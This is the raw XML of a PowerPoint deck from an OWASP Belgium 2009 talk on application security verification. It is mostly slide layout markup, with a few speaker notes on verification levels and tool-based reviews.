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ags/tag2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Default Extension="wmf" ContentType="image/x-wmf"/>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tags/tag3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+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8" r:id="rId2"/>
    <p:sldMasterId id="2147483689" r:id="rId3"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId29"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="321" r:id="rId4"/>
    <p:sldId id="325" r:id="rId5"/>
    <p:sldId id="300" r:id="rId6"/>
    <p:sldId id="353" r:id="rId7"/>
    <p:sldId id="330" r:id="rId8"/>
    <p:sldId id="332" r:id="rId9"/>
    <p:sldId id="333" r:id="rId10"/>
    <p:sldId id="334" r:id="rId11"/>
    <p:sldId id="347" r:id="rId12"/>
    <p:sldId id="301" r:id="rId13"/>
    <p:sldId id="277" r:id="rId14"/>
    <p:sldId id="339" r:id="rId15"/>
    <p:sldId id="358" r:id="rId16"/>
    <p:sldId id="359" r:id="rId17"/>
    <p:sldId id="354" r:id="rId18"/>
    <p:sldId id="337" r:id="rId19"/>
    <p:sldId id="341" r:id="rId20"/>
    <p:sldId id="355" r:id="rId21"/>
    <p:sldId id="356" r:id="rId22"/>
    <p:sldId id="357" r:id="rId23"/>
    <p:sldId id="342" r:id="rId24"/>
    <p:sldId id="361" r:id="rId25"/>
    <p:sldId id="362" r:id="rId26"/>
    <p:sldId id="360" r:id="rId27"/>
    <p:sldId id="328" r:id="rId28"/>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B2B2B2"/>
    <a:srgbClr val="FF7401"/>
    <a:srgbClr val="FC9204"/>
    <a:srgbClr val="CC3300"/>
    <a:srgbClr val="FF3300"/>
    <a:srgbClr val="FFCC00"/>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62" autoAdjust="0"/>
    <p:restoredTop sz="92281" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="-1128" y="-6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530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49688" y="0"/>
            <a:ext cx="2946400" cy="49530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a:latin typeface="Arial"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9429750"/>
            <a:ext cx="2946400" cy="495300"/>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49688" y="9429750"/>
            <a:ext cx="2946400" cy="495300"/>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a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B6962427-9A86-4E05-A1F4-092607AF3FC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917575" y="744538"/>
            <a:ext cx="4962525" cy="3722687"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>You have a number of options when verifying the security of an application. The standard gives you the flexibility to use any and all of these options in your verification effort.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39940" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E7569C4F-77EE-4C59-A6EF-25F9330F5CB2}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B6962427-9A86-4E05-A1F4-092607AF3FC3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>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917575" y="744538"/>
            <a:ext cx="4962525" cy="3722687"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Note: Clearly a level 1 review can’t do any more than what the tools can do, since it’s a tool based review. Given that tools don’t yet provide a huge amount of coverage of the application security problem space, level 1 reviews are understandable limited in their scope. But they are just the first level in the model. Higher levels provide better coverage and more rigor, as defined by the standard itself.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43012" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4A26BB3B-3C62-4A6A-9580-3A7985A2CB64}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21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5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="762000"/>
            <a:ext cx="7696200" cy="4953000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EAEAEA"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="336699"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5715000"/>
            <a:ext cx="9144000" cy="1149350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="336699"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 12" descr="owasp"/>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1676400" y="1066800"/>
            <a:ext cx="1371600" cy="1258888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="5165725"/>
            <a:ext cx="4191000" cy="549275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Copyright © The OWASP Foundation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="609600"/>
            <a:ext cx="9144000" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="777777"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6350" y="755650"/>
            <a:ext cx="1417638" cy="3740150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="003399">
              <a:alpha val="59000"/>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1" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6350" y="5302250"/>
            <a:ext cx="1417638" cy="412750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx1">
                  <a:gamma/>
                  <a:shade val="0"/>
                  <a:invGamma/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6350" y="4845050"/>
            <a:ext cx="1417638" cy="565150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="339933">
              <a:alpha val="71001"/>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3" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6350" y="2667000"/>
            <a:ext cx="1417638" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="003366">
              <a:alpha val="60001"/>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4" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1452563" y="2667000"/>
            <a:ext cx="681037" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="339933">
              <a:alpha val="71001"/>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5" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2170113" y="2667000"/>
            <a:ext cx="681037" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="339933">
              <a:alpha val="71001"/>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6" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2641600"/>
            <a:ext cx="9144000" cy="26988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Box 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="5937250"/>
            <a:ext cx="4800600" cy="519113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="EAEAEA"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The OWASP Foundation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8462963" y="2667000"/>
            <a:ext cx="681037" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="339933">
              <a:alpha val="71001"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Freeform 29"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2705100" y="2667000"/>
            <a:ext cx="1028700" cy="1219200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="528"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="192" y="528"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="452" y="260"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="456" y="1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="456" h="528">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192" y="528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452" y="260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="456" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="339933">
              <a:alpha val="33000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Freeform 30"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="7385050" y="2667000"/>
            <a:ext cx="1028700" cy="1219200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="528"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="192" y="528"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="452" y="260"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="456" y="1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="456" h="528">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192" y="528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452" y="260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="456" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="339933">
              <a:alpha val="33000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Box 33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="4229100"/>
            <a:ext cx="2667000" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP Belgium</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2009</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="777777"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Box 34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="6326188"/>
            <a:ext cx="4800600" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng">
                <a:solidFill>
                  <a:srgbClr val="EAEAEA"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="EAEAEA"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8194" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="762000"/>
            <a:ext cx="5867400" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038600" y="3260725"/>
            <a:ext cx="4648200" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPct val="5000"/>
              </a:spcBef>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="969696"/>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IE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{340B79EA-B0B1-4F70-817D-3C69628F6B8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
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{D2BB5202-F704-44F7-817F-9D21F73162B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F9FF9A0-B2A4-4938-B3F5-229AA49F942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312863"/>
